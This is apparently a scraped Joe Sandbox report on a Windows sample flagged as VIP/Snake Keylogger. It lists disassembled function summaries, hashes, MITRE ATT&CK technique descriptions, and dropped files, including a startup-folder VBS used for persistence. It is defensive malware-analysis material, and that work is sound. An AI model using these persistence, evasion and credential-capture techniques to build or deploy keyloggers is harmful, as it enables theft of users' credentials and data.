Instruction ID: ef47896783fac19fde9a2a6ec60e751b5d77d92f49251f8e146aaaa2c97f76d2
Opcode Fuzzy Hash: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
Instruction Fuzzy Hash: 78E02B066542301092313279BDC1EBF56C9CFC9750710186FF999C236AEEA48D9293AC

Function 00B00B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B00B23

Strings

AutoIt, xrefs: 00B00B17
Error allocating memory., xrefs: 00B00B1C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 5076d5ce795528c608df6194a2749c20890730cf11c672033847e7c9991f3f01
Instruction ID: a0b164f5bd323f98a5c75aae5ce9e17fde5a9b9e418c363d421d6581e0058fd4
Opcode Fuzzy Hash: 5076d5ce795528c608df6194a2749c20890730cf11c672033847e7c9991f3f01
Instruction Fuzzy Hash: E4E0D8322443182AD21036947D03FC97FC8CF05B11F24046AFB58654D38BE1645007E9

Function 00AC0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00ABF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00AC0D71,?,?,?,00AA100A), ref: 00ABF7CE

IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00AC0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00AC0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AC0D7F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
Instruction ID: 7e7074e66c8a27b06820b227f7237b4adf94d61ab1980ed2fe624ce322ede13d
Opcode Fuzzy Hash: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
Instruction Fuzzy Hash: F3E06D702003118BD3619FBCD904B567BE4AB00740F11496DE887D7661EFB4E4848BA1

Function 00AFD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AFD220

Strings

%.3d, xrefs: 00AFD22B
X64, xrefs: 00AFD2A8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
Instruction ID: e4ec695414edee3bb04aff097f87698860de312dff6f47488b9d79a1bd98bb21
Opcode Fuzzy Hash: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
Instruction Fuzzy Hash: 1BD012B180810CE9CB5197D0CC458FAB7BDFB08341F608452FA06A2041E634C50867A1

Function 00B32322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B3233F

Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3

Strings

Shell_TrayWnd, xrefs: 00B32325

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
Instruction ID: 2e773cf9b9ef47f4c363aaadf8e5b1fb74028b31592195ee84950eef5967d599
Opcode Fuzzy Hash: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
Instruction Fuzzy Hash: AED0C936394310B6E664A7B09C0FFDA7E54AB10B10F1149567655BB1E0C9B4A8018B54

Function 00B32356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3236C
PostMessageW.USER32(00000000), ref: 00B32373

Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3

Strings

Shell_TrayWnd, xrefs: 00B32365

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
Instruction ID: 35ea3d2dc20da3d2ae143acfca3cc77d5f9c1fc5195e6362cfe33caa0b04ef20
Opcode Fuzzy Hash: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
Instruction Fuzzy Hash: 2BD0C9323813107AE664A7B09C0FFCA7A54AB15B10F5149567655BB1E0C9B4A8018B54

Function 00ADBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00ADBE93
GetLastError.KERNEL32 ref: 00ADBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADBEFC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
Instruction ID: 74ada38d48943c55b244f7ecbd0d1c7d5c07e81a884ff70a84d94336dd8cffe5
Opcode Fuzzy Hash: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
Instruction Fuzzy Hash: 5C41C435610246EFCB21CFA5CD44BAA7BA5AF45310F26416AF95A9B3A1DB30DD00DB70

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report oagkiAhXgZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut6CF.tmp

C:\Users\user\AppData\Local\Temp\autBCB7.tmp

C:\Users\user\AppData\Local\Temp\autC60D.tmp

C:\Users\user\AppData\Local\Temp\brontothere

C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs

Static File Info

General

File Icon

Windows Analysis Report
oagkiAhXgZ.exe

Function 00AA42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00AA42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00AE2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00AA2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00AE065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00AA344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00AA2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00AA3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 00AD8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 017C4398 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre